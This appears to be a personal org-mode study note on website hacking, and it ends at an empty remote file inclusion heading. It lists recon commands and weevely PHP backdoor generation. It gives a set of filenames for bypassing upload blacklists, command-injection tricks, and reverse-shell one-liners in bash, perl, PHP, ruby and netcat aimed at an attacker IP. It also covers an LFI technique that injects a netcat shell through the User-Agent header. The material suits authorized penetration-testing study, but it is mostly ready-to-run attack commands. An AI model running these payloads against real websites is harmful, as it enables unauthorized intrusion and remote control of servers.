* Website Hacking
** Gathering Information

We can gather information from a website using a whois lookup:

- [[whois.domaintools.com][whois.domaintools.com]]

We can also discover subdomains:

#+begin_src bash
	knockpy --domain [target_domain] --recon # use a passive information gathering method
	knockpy --domain [target_domain] --bruteforce # use an active information gathering method
#+end_src

We can discover files using dirb:

#+begin_src bash
	dirb [target] [wordlist] [options]
#+end_src

** File Upload Vulnerabilities

They are the simplest type of vulnerability, as they allow users to upload
executable files, such as php files.

We can generate a PHP shell using weevely:

#+BEGIN_SRC bash
	weevely generate [password] [file_name] # generate backdoor
	weevely [url to file] [password] # connect to backdoor
#+END_SRC

If the website has some sort of protection to these kind of files, we can fire
up BurpSuite, rename our shell to ~shell.jpg~ so the content-type is set to
image/jpeg, and we can change the final filename with burpsuite. If it still
doesn't work, we can upload a file like ~shell.php.jpg~ to see if it works. Some
examples of names can be:

#+begin_src text
	upload.php			---	try to upload a simple php file
	upload.php.jpeg 		--- 	To bypass the blacklist.
	upload.jpg.php 			---	To bypass the blacklist. 
	upload.php 			---	and Then Change the content type of the file to image or jpeg.
	upload.php*			---	version - 1 2 3 4 5 6 7 
	upload.PHP			---	To bypass The BlackList
	upload.PhP			---	To bypass The BlackList
	upload.pHp			---	To bypass The BlackList
#+end_src

** Code Execution Vulnerabilities

These vulnerabilities, allow an attacker to execute OS commands, whether they
are Windows, or Linux commands. They can be used to get a reverse shell, or to
upload any file using the ~wget~ command.

We can append ~;~ at the end of a command to see if anything can be executed.
I.e. pwd. If ~;~ doesn't work, we can try to do ~|~.

Some commands we can execute to get a reverse shell are:

#+begin_src bash
  bash -i >& /dev/tcp/[ip_address]/8080 0>&1
#+end_src

#+begin_src perl
  perl -e 'use Socket;$i="[ip_address]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
#+end_src

#+begin_src php
  php -r '$sock=fsockopen("[ip_address]",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
#+end_src

#+begin_src ruby
  ruby -rsocket -e'f=TCPSocket.open("[ip_address]",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
#+end_src

#+begin_src bash
	nc -e /bin/sh [ip_address] 8080
#+end_src

For netcat, we'd need to listen at:

#+begin_src bash
  nc -vv -l -p 8080
#+end_src

** Local File Inclusion Vulnerabilities

Allows an attacker to read ANY file on the same server, and to access files
outside of the www directory. We can get ~/etc/passwd~, for example.

We can gain a reverse shell by exploiting this vulnerability, we can try to
inject code into readable files. What can be done is that we go to the
~/proc/self/environ~ file, and a variable ~HTTP_USER_AGENT~ is sent. With
BurpSuite we can modify the user agent under the header section for it to
execute PHP code. We can do something like:

#+begin_src php
  passthru("nc -e /bin/sh [ip_address] [port]");
#+end_src

** Remote File Inclusion Vulnerabilities
